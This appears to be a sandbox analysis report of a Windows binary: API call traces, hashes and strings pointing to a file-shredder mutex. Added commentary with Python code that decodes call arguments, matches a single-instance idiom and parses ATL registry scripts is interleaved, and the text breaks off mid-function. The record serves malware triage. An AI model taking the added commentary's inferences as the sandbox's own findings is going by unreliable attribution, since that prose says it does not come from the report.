                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 40abeb67ee043aea32e8690ca285f100373b4414e2d1248687a44cf818d667f1
                                • Instruction ID: 71719418a1b4fb13aa7b5aa533180aacdd603228149514a4ad730b87de8a9586
                                • Opcode Fuzzy Hash: 40abeb67ee043aea32e8690ca285f100373b4414e2d1248687a44cf818d667f1
                                • Instruction Fuzzy Hash: AF31BAB1E042289FEB649B04DC94BEABB35EF81314F2040EAD50D57240DA799EC2CF46
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 5ce2823a7871b2acd5e3e1b2dc81427670d575952ac963192ea187050240a4fb
                                • Instruction ID: dac66cc95bc8b01d603d776b89c768c4ce343fb921c84495077b8fc2c16ab045
                                • Opcode Fuzzy Hash: 5ce2823a7871b2acd5e3e1b2dc81427670d575952ac963192ea187050240a4fb
                                • Instruction Fuzzy Hash: 68318CB5D452289FDB649F04CC50BEABB71AF85314F2040EAD40D57240CA399ED2CF46
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 2d23705379fc4fb457e9e4454beea901acb2ecf30b8a6bed61fe92c9f92d011e
                                • Instruction ID: c8ee4a4fd1a5268f81d9b6f1173ded6ec42534c51f760a9137365c36237a247a
                                • Opcode Fuzzy Hash: 2d23705379fc4fb457e9e4454beea901acb2ecf30b8a6bed61fe92c9f92d011e
                                • Instruction Fuzzy Hash: B521FFF2D042249FE7649B08CC65BEABB34AF80314F1400F6E80D67240CA79AED1CF46
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 3e1301a223ec8c480cd37c99b0d67b72b36870dea40e8f68b6058af4725b6416
                                • Instruction ID: b04d92052e1a9242fcd62b235eb6ce943607c460441f50c781c8d2ff644ed56f
                                • Opcode Fuzzy Hash: 3e1301a223ec8c480cd37c99b0d67b72b36870dea40e8f68b6058af4725b6416
                                • Instruction Fuzzy Hash: C721FDF2E442248FEB649A18CC54BEABB31AB81314F2040F6D40D57240DA789EC2CF46
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 3b4ae8e346aa4bffae6b03aeaf2bee0d1cebb9923c008a3c251d92ab6b1c5bd3
                                • Instruction ID: 628a473148a750b3b4515e2ac1f6f0476f85678b521c9c4d520b8b01f3e2013b
                                • Opcode Fuzzy Hash: 3b4ae8e346aa4bffae6b03aeaf2bee0d1cebb9923c008a3c251d92ab6b1c5bd3
                                • Instruction Fuzzy Hash: 2821FFB2E442248FEB649B18CC58BE9BB31AF81314F2040E6D40D57280CA789EC2CF46
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: af9d9f517decce8a9a49804e3b39d00a2dc17a89163b4f6fa57c493975b4d132
                                • Instruction ID: 90fc563921f5a7bfe076efa3264523c28a58b333f6b94fd82723dedf2e7d7a6d
                                • Opcode Fuzzy Hash: af9d9f517decce8a9a49804e3b39d00a2dc17a89163b4f6fa57c493975b4d132
                                • Instruction Fuzzy Hash: E721CDB5E452248FEBA4DB04CC94BEABB75AF84314F2040E6D40D67240CA38AEC2CF46
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: e65aaa3730f4e9db59db954266a223db6bd455e4015ef3806ef208cbcd723a5f
                                • Instruction ID: bee3b69b0cb7532e6c2d321ee1b36428b0007147f78c261ae9762714a3971cfc
                                • Opcode Fuzzy Hash: e65aaa3730f4e9db59db954266a223db6bd455e4015ef3806ef208cbcd723a5f
                                • Instruction Fuzzy Hash: 9D21CDB5E452248FEBA4DB04CC94BEABB35AF84314F2040E6D40D67240CA38AEC1CF46
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: f78831e2d74b0e7d3f9044bbc3116be7cd7328b2d3067d396d412a235c4471ba
                                • Instruction ID: 4f7f27649dc378bb65b3cc19e9d27b51a747d98201ddc6d9602885c63ad5a57f
                                • Opcode Fuzzy Hash: f78831e2d74b0e7d3f9044bbc3116be7cd7328b2d3067d396d412a235c4471ba
                                • Instruction Fuzzy Hash: 2521CDB5E452248FEBA4DB04CC94BEABB75AF84314F2040E6D40D67240CA38AEC1CF56
                                APIs
                                • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,80000080,00000000,000000FF,?,?), ref: 00448A88
                                • GetFileSize.KERNEL32(00000000,?), ref: 00448AA8
                                • _memset.LIBCMT ref: 00448B0B
                                • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,00000000,00000001), ref: 00448B42
                                • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,00000000,00000001), ref: 00448B5C
                                • WriteFile.KERNEL32(?,?,00010000,004478D7,00000000,?,?,?,00000000,00000001), ref: 00448B82
                                • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,00000000,00000001), ref: 00448BB1
                                • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,00000000,00000001), ref: 00448BCB
                                • WriteFile.KERNEL32(?,?,?,004478D7,00000000,?,?,?,00000000,00000001), ref: 00448BF1
                                • CloseHandle.KERNEL32(?,?,?,?,00000000,00000001), ref: 00448C0C
                                • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,80000080,00000000,?,?,?,00000000,00000001), ref: 00448C28
                                • CloseHandle.KERNEL32(00000000), ref: 00449641
                                Similarity
                                • API ID: File$ObjectSingleWait$CloseCreateHandleWrite$Size_memset
                                • String ID:
                                • API String ID: 1172678342-0
                                • Opcode ID: 8158509e58f484527f8a71e58faa1b2d8b70b3c493390f632461b5bab676af5f
                                • Instruction ID: 64ce1d2b17513850fb0e4411e5c373f0339fe494243065142823b194911eea1b
                                • Opcode Fuzzy Hash: 8158509e58f484527f8a71e58faa1b2d8b70b3c493390f632461b5bab676af5f
                                • Instruction Fuzzy Hash: 2F729F71A00302ABFF209F658C85F6F77A8AB44B14F24462AB911EB2D0DB79DD41D76C
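The VirtualAlloc records and the CreateFileW/WriteFile record above list their arguments as raw hexadecimal, so reading them means knowing the SDK flag values. The following Python is an added example written for this page, not code from the report or from the sample: it parses the report's `Api.Module(args), ref: address` line format and names the flags for the calls quoted above. The sample lines are copied from the records; `?` is an argument the sandbox did not recover, and the constant values are the Windows SDK definitions. It shows that the allocation at 0041D846 requests MEM_COMMIT|MEM_RESERVE with PAGE_READWRITE (no execute protection at this call site, so it is not by itself a shellcode staging buffer), and that the file routine opens an existing file for GENERIC_READ|GENERIC_WRITE with FILE_FLAG_WRITE_THROUGH, polls a handle with a zero timeout between writes and writes in 65536-byte blocks, which is consistent with an in-place overwrite loop and with the file-shredder strings (Q360FileSmasher, /shredfilelist=) elsewhere in this report.

```python
"""Decode the hexadecimal arguments in Joe Sandbox 'APIs' trace lines.

Added example, not code from the report or from the sample: it parses lines of
the form  Api.Module(arg,arg,...), ref: ADDRESS  and names the Win32 flag bits
for a few APIs. SAMPLE_TRACE is copied from the records above; '?' marks an
argument the sandbox did not recover. Constant values are Windows SDK values.
"""
import re
from typing import Callable, Dict, List, Optional

SAMPLE_TRACE = """
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,80000080,00000000,000000FF,?,?), ref: 00448A88
WaitForSingleObject.KERNEL32(?,00000000,?,?,?,00000000,00000001), ref: 00448B42
WriteFile.KERNEL32(?,?,00010000,004478D7,00000000,?,?,?,00000000,00000001), ref: 00448B82
"""

LINE_RE = re.compile(r"^\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")

MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
             0x100000: "MEM_TOP_DOWN", 0x20000000: "MEM_LARGE_PAGES"}
PAGE_BASE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MOD = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x20000000: "FILE_FLAG_NO_BUFFERING",
              0x40000000: "FILE_FLAG_OVERLAPPED", 0x80000000: "FILE_FLAG_WRITE_THROUGH"}


def bits(vocab: Dict[int, str]) -> Callable[[int], str]:
    """Build a decoder that names every set bit present in vocab, high bit first."""
    def decode(value: int) -> str:
        names, rest = [], value
        for bit, name in sorted(vocab.items(), reverse=True):
            if (rest & bit) == bit:
                names.append(name)
                rest &= ~bit
        if rest:                              # bits with no name in the vocabulary
            names.append(hex(rest))
        return "|".join(names) if names else "0"
    return decode


def enum(vocab: Dict[int, str]) -> Callable[[int], str]:
    return lambda v: vocab.get(v, hex(v))


def page_protect(value: int) -> str:
    """PAGE_* is an enumeration in the low byte plus modifier bits above it."""
    base = PAGE_BASE.get(value & 0xFF, hex(value & 0xFF))
    mods = bits(PAGE_MOD)(value & ~0xFF)
    return base if mods == "0" else f"{base}|{mods}"


def timeout(value: int) -> str:
    return "INFINITE" if value == 0xFFFFFFFF else "0 (poll, no wait)" if value == 0 else f"{value} ms"


def byte_count(value: int) -> str:
    return f"{value} ({value // 1024} KiB)" if value and value % 1024 == 0 else str(value)


# api -> [(argument index, parameter name, decoder)]
DECODERS = {
    "VirtualAlloc": [(2, "flAllocationType", bits(MEM_FLAGS)), (3, "flProtect", page_protect)],
    "CreateFileW": [(1, "dwDesiredAccess", bits(ACCESS)), (2, "dwShareMode", bits(SHARE)),
                    (4, "dwCreationDisposition", enum(DISPOSITION)),
                    (5, "dwFlagsAndAttributes", bits(FILE_FLAGS))],
    "WaitForSingleObject": [(1, "dwMilliseconds", timeout)],
    "WriteFile": [(2, "nNumberOfBytesToWrite", byte_count)],
}


def parse_line(line: str) -> Optional[dict]:
    """Split one trace line into api, module, raw argument tokens and call site."""
    m = LINE_RE.match(line)
    if not m:
        return None                           # e.g. '_memset.LIBCMT ref: ...' has no argument list
    api, module, args, ref = m.groups()
    return {"api": api, "module": module, "ref": int(ref, 16),
            "args": [a.strip() for a in args.split(",")] if args else []}


def decode_call(rec: dict) -> Dict[str, str]:
    """Name the decodable arguments of one parsed call; unknown ('?') tokens pass through."""
    out: Dict[str, str] = {}
    for idx, name, fn in DECODERS.get(rec["api"], []):
        if idx >= len(rec["args"]):
            continue
        raw = rec["args"][idx]
        try:
            out[name] = fn(int(raw, 16))
        except ValueError:
            out[name] = raw
    return out


def decode_trace(text: str) -> List[dict]:
    recs = [r for r in (parse_line(l) for l in text.splitlines()) if r]
    for r in recs:
        r["decoded"] = decode_call(r)
    return recs


def allocates_executable(rec: dict) -> bool:
    """Triage check: does this VirtualAlloc ask for an executable page protection?"""
    return rec["api"] == "VirtualAlloc" and "EXECUTE" in rec.get("decoded", {}).get("flProtect", "")


def opens_existing_for_write(rec: dict) -> bool:
    """Triage check: CreateFileW that opens an already-existing file with write access."""
    d = rec.get("decoded", {})
    writable = any(f in d.get("dwDesiredAccess", "") for f in ("GENERIC_WRITE", "GENERIC_ALL"))
    return rec["api"] == "CreateFileW" and writable and d.get("dwCreationDisposition") == "OPEN_EXISTING"


if __name__ == "__main__":
    for r in decode_trace(SAMPLE_TRACE):
        print(f"{r['ref']:08X} {r['api']:<20} {r['decoded']}")
```

The parser only handles lines that carry an argument list; entries such as `_memset.LIBCMT ref: 00448B0B` return None. Arguments containing commas inside string values would need a quote-aware split, which these records do not require.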
                                APIs
                                • SetErrorMode.KERNEL32(00008003), ref: 0043E2BC
                                • ImmDisableIME.IMM32(00000000), ref: 0043E2C4
                                • GetCommandLineW.KERNEL32(00000000), ref: 0043E2C9
                                  • Part of subcall function 0043E180: _memset.LIBCMT ref: 0043E1B6
                                  • Part of subcall function 0043E180: _memset.LIBCMT ref: 0043E1C9
                                  • Part of subcall function 0043E180: _memset.LIBCMT ref: 0043E232
                                  • Part of subcall function 0043E180: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0043E247
                                  • Part of subcall function 0043E180: WTSQuerySessionInformationW.WTSAPI32(00000000,000000FF,00000004,?,?), ref: 0043E270
                                • CreateMutexW.KERNEL32(00000000,00000001,Local\Q360FileSmasher), ref: 0043E2F1
                                • GetLastError.KERNEL32 ref: 0043E2FD
                                • CloseHandle.KERNEL32(00000000), ref: 0043E30B
                                • StrStrIW.SHLWAPI(00000000,/shredfilelist="), ref: 0043E341
                                • StrStrIW.SHLWAPI(00000000,/settings), ref: 0043E35E
                                • FindWindowW.USER32(Q360FileSmasher,00000000), ref: 0043E385
                                • PostMessageW.USER32(00000000,0000062A,00000000,00000000), ref: 0043E395
                                Similarity
                                • API ID: _memset$Error$CloseCommandCreateDisableFileFindHandleInformationLastLineMessageModeModuleMutexNamePostQuerySessionWindow
                                • String ID: "%s\%s"$%s%s" \elevated$/settings$/shredfilelist="$CrashReport.dll$FileSmasher$Initialize$Local\Q360FileSmasher$OnExiting$Q360FileSmasher$QHFileSmasher.exe$T9N$T9N$T9N$\elevated$j$k
                                • API String ID: 1902784322-2381632180
                                • Opcode ID: 59198087e51c1363d126bae50eb2ade3f94f94c331f8b47c28bae9ad9aa6ace2
                                • Instruction ID: 70a8ff0a3b9e5c91b017811f117eb0c60edb2bcc08bfe4f646206ccabeb3a458
                                • Opcode Fuzzy Hash: 59198087e51c1363d126bae50eb2ade3f94f94c331f8b47c28bae9ad9aa6ace2
                                • Instruction Fuzzy Hash: 47B1F375A002059BD700EBB6DC46FAE77A8EF48315F04426EF901E72E2DB789905CB6D
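The record above is a start-up routine: it suppresses error dialogs, creates a named mutex and immediately reads GetLastError, closes the handle, scans the command line for /shredfilelist= and /settings, then looks up a window named Q360FileSmasher and posts it a private message. That is the standard single-instance guard of a desktop application, and the Q360FileSmasher names are those of a file-shredding utility, so on its own this sequence is not a maliciousness signal; its value is as a pivot (the mutex name for host hunting, the window class for correlating with the product it claims to be). The following Python is an added example written for this page, not code from the report or from the sample: an ordered-subsequence matcher that recognises the idiom in an API call list and pulls out the pivots. The call list is constructed from the record's entries with `?` for unrecovered arguments; the comparison value after GetLastError is not visible in the trace, and the standard idiom tests for ERROR_ALREADY_EXISTS (183). Message and error-mode constants are Windows SDK values.

```python
"""Ordered-pattern matching over an API call list: the single-instance guard.

Added example, not code from the report or from the sample. TRACE is built from
the 'APIs' entries of the record above ('?' = argument the sandbox did not
recover). Windows SDK constants used: WM_USER = 0x400, WM_APP = 0x8000,
SEM_NOGPFAULTERRORBOX = 0x2.
"""
from typing import Callable, Dict, List, Optional, Sequence, Tuple

Call = Tuple[str, List[str]]                                  # (api, raw argument tokens)
Step = Tuple[str, Optional[Callable[[List[str]], bool]]]      # (api, optional argument predicate)

TRACE: List[Call] = [
    ("SetErrorMode", ["00008003"]),
    ("ImmDisableIME", ["00000000"]),
    ("GetCommandLineW", ["00000000"]),
    ("CreateMutexW", ["00000000", "00000001", r"Local\Q360FileSmasher"]),
    ("GetLastError", []),
    ("CloseHandle", ["00000000"]),
    ("StrStrIW", ["00000000", '/shredfilelist="']),
    ("StrStrIW", ["00000000", "/settings"]),
    ("FindWindowW", ["Q360FileSmasher", "00000000"]),
    ("PostMessageW", ["00000000", "0000062A", "00000000", "00000000"]),
]


def match_in_order(calls: Sequence[Call], steps: Sequence[Step], window: int = 8) -> Optional[List[int]]:
    """Indices of calls matching `steps` in order, each within `window` calls of the
    previous match (other calls may be interleaved), or None if any step is missing."""
    idx: List[int] = []
    pos = 0
    for api, pred in steps:
        limit = len(calls) if not idx else min(len(calls), idx[-1] + 1 + window)
        found = next((i for i in range(pos, limit)
                      if calls[i][0] == api and (pred is None or pred(calls[i][1]))), None)
        if found is None:
            return None
        idx.append(found)
        pos = found + 1
    return idx


def looks_like_name(tok: str) -> bool:
    """A named object rather than a NULL, pointer or unrecovered token."""
    return tok != "?" and not set(tok.upper()) <= set("0123456789ABCDEF")


def message_name(hex_id: str) -> str:
    v = int(hex_id, 16)
    if v >= 0x8000:
        return f"WM_APP+0x{v - 0x8000:X}"
    if v >= 0x400:
        return f"WM_USER+0x{v - 0x400:X}"
    return f"0x{v:X}"


def single_instance_guard(calls: Sequence[Call]) -> Optional[Dict[str, str]]:
    """CreateMutexW(name) -> GetLastError -> CloseHandle, optionally followed by
    FindWindowW -> PostMessageW handing the request to the running instance."""
    guard = match_in_order(calls, [
        ("CreateMutexW", lambda a: len(a) >= 3 and looks_like_name(a[2])),
        ("GetLastError", None),
        ("CloseHandle", None),
    ])
    if guard is None:
        return None
    name = calls[guard[0]][1][2]
    info = {"mutex": name,
            "namespace": ("Local" if name.startswith("Local\\")
                          else "Global" if name.startswith("Global\\") else "unqualified")}
    tail = calls[guard[-1]:]
    handoff = match_in_order(tail, [("FindWindowW", None), ("PostMessageW", None)], window=16)
    if handoff:
        info["window_class"] = tail[handoff[0]][1][0]
        info["message"] = message_name(tail[handoff[1]][1][1])
    return info


def command_switches(calls: Sequence[Call]) -> List[str]:
    """Switch literals the routine searches for in the command line (StrStrIW needle)."""
    return [a[1] for api, a in calls if api == "StrStrIW" and len(a) > 1]


def suppresses_crash_dialog(calls: Sequence[Call]) -> bool:
    """SetErrorMode with SEM_NOGPFAULTERRORBOX: the process will die silently on a fault."""
    for api, args in calls:
        if api == "SetErrorMode" and args:
            return bool(int(args[0], 16) & 0x2)
    return False


if __name__ == "__main__":
    print(single_instance_guard(TRACE), command_switches(TRACE), suppresses_crash_dialog(TRACE))
```

A `Local\` prefix places the mutex in the session-local object namespace, so the guard is per logon session; a `Global\` prefix would make it machine-wide. The posted message decodes to WM_USER+0x22A, a private message whose meaning is defined by the receiving window, so the handler in the running instance is where the forwarded command line is actually acted on.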
                                Similarity
                                • API ID: ___getlocaleinfo
                                • String ID:
                                • API String ID: 1937885557-0
                                • Opcode ID: 7149db81927407c76787afe78904fe86b4b779e5014d3df2113b982d8224dec7
                                • Instruction ID: d78bb72a78f728332970ea5f5fe48e6d28cccd5370fe34feca858d2a329bf209
                                • Opcode Fuzzy Hash: 7149db81927407c76787afe78904fe86b4b779e5014d3df2113b982d8224dec7
                                • Instruction Fuzzy Hash: A4E1BCB290020DFEEF12DAE1CC85DFF7BFDEB44748F05092EB25592041EA75AA059B64
                                APIs
                                • lstrcmpiW.KERNEL32 ref: 004462B6
                                • lstrcmpiW.KERNEL32(?,ForceRemove), ref: 004462C5
                                • CharNextW.USER32(?), ref: 00446315
                                • lstrcmpiW.KERNEL32(?,?), ref: 00446336
                                • lstrlenW.KERNEL32(?), ref: 004463BE
                                • lstrcmpiW.KERNEL32(?,NoRemove), ref: 0044641C
                                • lstrcmpiW.KERNEL32(?,Val), ref: 0044644F
                                • RegDeleteValueW.ADVAPI32(?,?,?), ref: 0044652E
                                • RegCloseKey.ADVAPI32(?), ref: 00446546
                                • CharNextW.USER32(?), ref: 00446588
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,?), ref: 004465C6
                                • RegCloseKey.ADVAPI32(?), ref: 004465DD
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0044661D
                                • RegCloseKey.ADVAPI32(?), ref: 0044662C
                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 00446675
                                • RegCloseKey.ADVAPI32(?), ref: 0044668A
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 00446718
                                • RegCloseKey.ADVAPI32(?), ref: 0044672F
                                • lstrlenW.KERNEL32(?,1D1D1D8C), ref: 0044679A
                                • RegCloseKey.ADVAPI32(?,1D1D1D8C), ref: 00446886
                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 004468D0
                                • RegCloseKey.ADVAPI32(?), ref: 00446997
                                Similarity
                                • API ID: Close$lstrcmpi$Open$CharDeleteNextlstrlen$CreateValue
                                • String ID: Delete$ForceRemove$NoRemove$Val
                                • API String ID: 2903862752-1781481701
                                • Opcode ID: 537ced69c2cd842a418a76494a0b16460cd5d7ff513b27c580eaa63c3c2ddb9f
                                • Instruction ID: 38dacbaf035d53700198e9207873e49377624f0e13f7760dddca0bad48bb2fbe
                                • Opcode Fuzzy Hash: 537ced69c2cd842a418a76494a0b16460cd5d7ff513b27c580eaa63c3c2ddb9f
                                • Instruction Fuzzy Hash: 6B12B971D01239ABEF35AF55DC886AEB2B4AF45744F0101AFE405A7340D7788E85CF9A
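The record above compares tokens case-insensitively against Delete, ForceRemove, NoRemove and Val, walks characters with CharNextW, and then opens, creates and deletes keys and values. That keyword set is the grammar of ATL's registry script (.rgs), the text resource an ATL-based COM component runs through its registrar at registration time; the samDesired values in the record, 0x20019 and 0x2001F, are KEY_READ and KEY_READ|KEY_WRITE. Recovering the script (usually a REGISTRY-type resource in the binary) therefore predicts the registry changes such a routine will make. The following Python is an added example written for this page, not code from the report, from the sample, or from ATL itself: a re-implementation of the script grammar that emits the key and value operations a script drives. The script, the CLSID in it and the module path are constructed placeholders; `%MODULE%` is ATL's standard replaceable parameter.

```python
"""Parse an ATL registry script (.rgs) into the registry operations it drives.

Added example, not code from the report, from the sample, or from ATL's own
parser: a re-implementation of the script grammar whose keywords (NoRemove,
ForceRemove, Delete, Val) the record above compares against. SAMPLE_RGS is
constructed; the CLSID and module path are placeholders.
"""
import re
from typing import Dict, List, Optional, Tuple

Tok = Tuple[str, str]             # ("str", quoted text) | ("sym", "{" / "}" / "=") | ("word", text)
Op = Tuple[str, str, str, str]    # (operation, key path, value name, "REG_TYPE:data" or flag)

ROOTS = {"HKCR": "HKEY_CLASSES_ROOT", "HKCU": "HKEY_CURRENT_USER", "HKLM": "HKEY_LOCAL_MACHINE",
         "HKU": "HKEY_USERS", "HKCC": "HKEY_CURRENT_CONFIG"}
KEYWORDS = {"noremove", "forceremove", "delete", "val"}
VALUE_TYPES = {"s": "REG_SZ", "d": "REG_DWORD", "b": "REG_BINARY", "m": "REG_MULTI_SZ", "e": "REG_EXPAND_SZ"}
TOKEN_RE = re.compile(r"'([^']*)'|(\S+)")   # single-quoted string or whitespace-delimited token

SAMPLE_RGS = r"""
HKCR
{
    NoRemove CLSID
    {
        ForceRemove {7A2D0000-0000-0000-0000-000000000001} = s 'Example Object'
        {
            InprocServer32 = s '%MODULE%'
            {
                val ThreadingModel = s 'Apartment'
            }
            Delete OldSubKey
        }
    }
}
"""


def tokenize(text: str) -> List[Tok]:
    toks: List[Tok] = []
    for m in TOKEN_RE.finditer(text):
        if m.group(1) is not None:
            toks.append(("str", m.group(1)))
        else:
            t = m.group(2)                      # a '{GUID}' key name is one word, not a brace
            toks.append(("sym", t) if t in ("{", "}", "=") else ("word", t))
    return toks


def parse_value(toks: List[Tok], i: int, subst: Dict[str, str]) -> Tuple[int, str]:
    """'= <type> <data>' starting at toks[i]; returns (next index, 'REG_TYPE:data')."""
    if i + 2 >= len(toks) or toks[i] != ("sym", "="):
        raise ValueError("expected '= type data'")
    vtype = toks[i + 1][1].lower()
    if vtype not in VALUE_TYPES:
        raise ValueError(f"unknown value type {vtype!r}")
    data = toks[i + 2][1]
    for k, v in subst.items():                  # replaceable parameters such as %MODULE%
        data = data.replace(f"%{k}%", v)
    return i + 3, f"{VALUE_TYPES[vtype]}:{data}"


def parse_block(toks: List[Tok], i: int, path: str, ops: List[Op], subst: Dict[str, str]) -> int:
    """Parse '{ entries }' under key `path`; returns the index after the closing brace."""
    if i >= len(toks) or toks[i] != ("sym", "{"):
        raise ValueError(f"expected '{{' after {path}")
    i += 1
    while i < len(toks) and toks[i] != ("sym", "}"):
        mode = ""
        if toks[i][0] == "word" and toks[i][1].lower() in KEYWORDS:
            mode, i = toks[i][1].lower(), i + 1
        name, i = toks[i][1], i + 1
        if mode == "val":                       # named value under the current key
            i, data = parse_value(toks, i, subst)
            ops.append(("set_value", path, name, data))
            continue
        sub = f"{path}\\{name}"
        if mode == "delete":                    # Delete: remove the key, nothing else
            ops.append(("delete_key", sub, "", ""))
            continue
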